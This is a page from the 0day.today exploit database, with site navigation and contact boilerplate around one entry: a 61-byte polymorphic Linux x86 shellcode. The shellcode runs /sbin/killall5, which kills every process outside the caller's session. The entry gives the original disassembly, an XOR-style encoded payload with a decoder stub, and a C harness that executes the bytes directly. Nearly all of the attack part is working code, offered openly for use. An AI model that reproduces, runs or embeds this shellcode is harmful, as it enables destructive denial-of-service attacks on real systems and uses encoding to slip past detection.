0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

linux/x86 killall5 polymorphic shellcode 61 bytes

Author

Jonathan Salwan

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=================================================
linux/x86 killall5 polymorphic shellcode 61 bytes
=================================================



/*
   Title:	Linux x86 | Polymorphic Shellcode killall5 - 61 bytes
   Author: 	Jonathan Salwan


   killall5 is the SystemV killall command. It sends a signal to all processes 
   except the processes in its own session, so it won't kill the shell that is 
   running the script it was called from. Its primary (only) use is in the rc 
   scripts found in the /etc/init.d directory.


 Original Informations
 =====================

 Disassembly of section .text:

 08048054 <.text>:
 8048054:       31 c0                   xor    %eax,%eax
 8048056:       50                      push   %eax
 8048057:       66 68 6c 35             pushw  $0x356c
 804805b:       68 6c 6c 61 6c          push   $0x6c616c6c
 8048060:       68 6e 2f 6b 69          push   $0x696b2f6e
 8048065:       68 2f 73 62 69          push   $0x6962732f
 804806a:       89 e3                   mov    %esp,%ebx
 804806c:       50                      push   %eax
 804806d:       89 e2                   mov    %esp,%edx
 804806f:       53                      push   %ebx
 8048070:       89 e1                   mov    %esp,%ecx
 8048072:       b0 0b                   mov    $0xb,%al
 8048074:       cd 80                   int    $0x80

*/

#include "stdio.h"

int main(int argc, char *argv[])
{

char shellcode[] =	

			"\xeb\x11\x5e\x31\xc9\xb1\x37\x80"
			"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
  			"\xf6\xeb\x05\xe8\xea\xff\xff\xff"		
			"\x32\xc1\x51\x67\x69\x6d\x36\x69"
			"\x6d\x6d\x62\x6d\x69\x6f\x30\x6c"
			"\x6a\x69\x30\x74\x63\x6a\x8a\xe4"
			"\x51\x8a\xe3\x54\x8a\xe2\xb1\x0c"
			"\xce\x81\x41\xce\x81";

	printf("Length: %d\n",strlen(shellcode));
	(*(void(*)()) shellcode)();
	
	return 0;
}



#  0day.today [2024-10-05]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

linux/x86 killall5 polymorphic shellcode 61 bytes

Report Error

Report Error